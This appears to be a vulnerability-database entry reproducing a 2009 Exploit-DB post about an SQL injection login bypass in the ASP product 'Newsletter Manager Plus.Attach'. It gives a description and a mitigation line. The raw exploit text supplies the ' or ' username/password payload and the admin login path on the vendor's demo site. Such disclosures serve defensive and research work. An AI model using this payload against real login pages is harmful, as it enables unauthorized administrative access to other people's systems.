Newsletter Manager Plus.Attach

vendor:

by:

ByALBAYX

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Newsletter Manager Plus.Attach

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Newsletter Manager Plus.Attach

An SQL injection vulnerability exists in Newsletter Manager Plus.Attach, which allows an attacker to gain access to the administrative panel. By sending a specially crafted HTTP request, an attacker can inject arbitrary SQL code into the application. This can be used to bypass authentication and gain access to the administrative panel.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG

@~~=From     : Turkish
@~~=======================================~~@
@~~=Script   :Newsletter Manager Plus.Attach

@~~=S.Site   :http://designerfreesolutions.com

@~~=Dty      :http://designerfreesolutions.com/web/viewitem.asp?idproduct=1025

@~~=Demo     :http://designerfreesolutions.com/newsletterattach

@~~=Price    :47.00 USD
@~~=======================================~~@

@~~=Exploit:


@~~=Username: ' or '

@~~=Password: ' or '


@~~=http://c4team.org /Newsletter Manager /admin/index.asp


@~~=Demo:

@~~=http://www.designerfreesolutions.com/newsletterattach/admin/index.asp

vs..
@~~=======================================~~@
@~~=Greetz For
  
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
@~~=======================================~~@

# milw0rm.com [2009-02-26]